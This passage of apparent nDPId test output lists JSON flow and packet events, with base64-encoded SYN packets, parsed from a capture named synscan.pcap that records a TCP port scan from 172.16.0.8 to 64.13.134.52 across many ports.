+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAscOwAADQGo4asEAAIQA2GNIzSCDndUoMYAAAAAGACBAAsVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAst4UAADMGXe2sEAAIQA2GNIzSBL3dUoMYAAAAAGACEAAj0gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsFa0AACoGCMasEAAIQA2GNIzSSizdUoMYAAAAAGACDADiYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsN6IAADgG2NCsEAAIQA2GNIzSApzdUoMYAAAAAGACBAAx8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAssMQAACwGa66sEAAIQA2GNIzSACHdUoMYAAAAAGACBAA0bgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsLEAAADgG5DKsEAAIQA2GNIzSFuPdUoMYAAAAAGACBAAdrAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+oAACgGiIisEAAIQA2GNIzSgAndUoMYAAAAAGACBAC0hQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHdEAADUG9aGsEAAIQA2GNIzS3aLdUoMYAAAAAGACCABS7AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsiq8AAC4Gj8OsEAAIQA2GNIzSI4vdUoMYAAAAAGACDAAJBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAso2cAACwGeQusEAAIQA2GNIzSD83dUoMYAAAAAGACBAAkwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsQAcAADQG1GusEAAIQA2GNIzSBEbdUoMYAAAAAGACBAAwSQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQwAACwG92asEAAIQA2GNIzSCBTdUoMYAAAAAGACBAAsewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EoAADgGLCisEAAIQA2GNIzSH5PdUoMYAAAAAGACBAAU\/AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsgf0AACsGm3WsEAAIQA2GNIzSAwndUoMYAAAAAGACEAAlhgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsqw0AADUGaGWsEAAIQA2GNIzSBDLdUoMYAAAAAGACCAAsXQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsFlIAADYG\/CCsEAAIQA2GNIzSNZrdUoMYAAAAAGACDAD29AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0oAADgGZSisEAAIQA2GNIzSD1DdUoMYAAAAAGACBAAlPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHMAACoGWf+sEAAIQA2GNIzSFxDdUoMYAAAAAGACDAAVfwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_packet_id":1,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060906,"pkt":"ACYLMQczACWzv5HuCABFAAAs2HMAACoGRf+sEAAIQA2GNIzSAxPdUoMYAAAAAGACDAApfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060948,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_packet_id":1,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060948,"pkt":"ACYLMQczACWzv5HuCABFAAAsW74AAC8GvbSsEAAIQA2GNIzTUVzdU4MZAAAAAGACEADXLwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRtIAACoG16CsEAAIQA2GNIzTZmbdU4MZAAAAAGACDADGJQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswvIAAC8GVoCsEAAIQA2GNIzTAHfdU4MZAAAAAGACEAAoFQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAslyQAADQGfU6sEAAIQA2GNIzTA2ndU4MZAAAAAGACBAAxIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs4nsAACsGOvesEAAIQA2GNIzTA4TdU4MZAAAAAGACEAAlCAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 